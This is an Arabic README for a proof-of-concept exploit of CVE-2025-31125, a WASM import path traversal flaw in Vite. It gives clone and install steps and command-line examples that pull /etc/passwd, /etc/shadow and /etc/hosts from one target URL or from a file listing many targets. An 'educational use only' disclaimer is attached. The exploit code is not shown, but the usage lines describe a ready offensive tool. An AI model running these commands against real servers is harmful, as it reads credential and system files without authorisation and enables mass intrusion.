
Vite WASM Import Path Traversal 🛡️
هذا البرنامج النصي هو إثبات مفهوم (PoC) لاستغلال CVE-2025-31125، وهي ثغرة أمنية موجودة في Vite. يستغل الاستغلال مشكلة اجتياز مسار استيراد WASM لاسترداد الملفات الحساسة من الخوادم الضعيفة التي تشغل إطار عمل Vite. يسمح للمهاجمين بالوصول إلى ملفات مثل /etc/passwd و /etc/shadow و /etc/hosts وملفات حساسة أخرى مكشوفة بواسطة الخادم. ⚠️
هذه الأداة لأغراض تعليمية فقط ويجب استخدامها فقط على الأنظمة التي تمتلكها أو لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى الأنظمة غير قانوني ويمكن أن يؤدي إلى عواقب قانونية. استخدم هذه الأداة بمسؤولية! ⚖️
/etc/passwd و والمزيد! 💻/etc/shadowrequests 📦urllib3 🔒toilet (اختياري، للشعار) 🎨pip3 install -r requirements.txt
لتثبيت toilet (اختياري للشعار) على نظامك:
sudo apt install toiletbrew install toiletgit clone https://github.com/0xgh057r3c0n/CVE-2025-31125.git
cd CVE-2025-31125
pip3 install -r requirements.txt
لاستخدام البرنامج النصي، قم بتوفير إما عنوان URL هدف واحد باستخدام -u أو ملف يحتوي على عناوين URL متعددة باستخدام -f.
-u, --url: استهداف عنوان URL واحد. 🌐-f, --file: توفير ملف بقائمة عناوين URL الهدف (واحد لكل سطر). 📄--path: تحديد المسار المراد استغلاله (مثل /etc/passwd, /etc/shadow). الإعداد الافتراضي هو /etc/passwd. 🛠️--no-verify: تعطيل التحقق من SSL (مفيد للشهادات الموقعة ذاتياً). 🔒/etc/passwd)python3 exploit.py -u https://example.com --no-verify
/etc/shadow)python3 exploit.py -u https://example.com --no-verify --path /etc/shadow
/etc/passwd)python3 exploit.py -f targets.txt --no-verify
/etc/hosts)python3 exploit.py -f targets.txt --no-verify --path /etc/hosts
🙋♂️ اتصل (للتعاون والبحوث ومناقشات الأمن السيبراني):
هذا المشروع مرخص بموجب رخصة MIT. 🌟
